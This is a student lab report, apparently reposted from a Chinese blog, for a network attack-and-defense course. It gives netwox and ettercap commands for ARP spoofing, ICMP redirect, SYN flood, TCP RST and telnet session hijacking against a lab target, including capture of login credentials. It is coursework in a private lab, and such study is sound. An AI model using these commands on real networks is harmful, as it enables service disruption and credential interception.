• 20211909 202120222 《网络攻防实践》第四次作业


    实验过程

    arp缓存欺骗攻击

    首先先测试靶机与攻击机的联通性,并查看攻击机的mac地址

    ping 192.168.238.128
    arp -a
    

    在攻击机上核对mac地址

    ifconfig
    

    在kali上使用netwox更改kali的mac地址

    netwox 80 -e BC:17:B8:CE:7B:9C 192.168.238.128
    

    在靶机上再次查看kali mac地址,发现已经被修改

    icmp重定向攻击

    确认靶机与百度的连接性,查看网关

    ping www.baidu.com
    route -n
    

    在攻击机Kali上使用工具 netwox 伪造重定向数据包

    netwox 86 -f "host 192.168.238.129" -g 192.168.238.129 -i 192.168.238.2
    

    在靶机上重新ping百度

    ping www.baidu.com
    

    可以发现已经被重定向。

    wireshark抓包也捕获到了重定向的icmp包。

    SYN Flood 攻击

    首先在攻击机上尝试登录靶机的telnet服务

    telnet 192.168.238.129
    

    没有问题,接着在kali中使用命令对靶机进行SYN Flood攻击

    netwox 76 -i 192.168.238.129 -p 23
    

    再次连接靶机telnet服务,发现一直无法连接

    telnet 192.168.238.129
    

    打开wireshark捕包,发现攻击机给靶机23端口发送大量SYN包

    TCP RST攻击

    一样的先测试靶机上telnet服务

    telnet 192.168.238.129
    

    在kali上进行RST攻击

    netwox 78 -i 192.168.238.129
    

    再次连接靶机telnet服务发现失败

    telnet 192.168.238.129
    

    wireshark上也可以抓到RST包

    TCP会话劫持攻击

    kali上打开ettercap

    ettercap -G
    

    选中靶机为攻击目标

    当再次连接靶机telnet服务时,可以在ettercap上看到用户名和密码

    学习体会

    掌握了新工具的使用,对几种不同攻击有了更深的理解。

  • 相关阅读:
    SQL Server -使用表触发器记录表插入,更新,删除行数
    利用DataSet部分功能实现网站登录
    SQL Server排序的时候使null值排在最后
    大数据操作:删除和去重
    C#匿名类型序列化、反序列化
    Js调用asp.net后台代码
    C# Excel
    ajax的介绍
    MySQL数据库的知识总结
    ASP.NET MVC 入门系列教程
  • 原文地址:https://www.cnblogs.com/luoleqi/p/16125374.html
Copyright © 2020-2023  润新知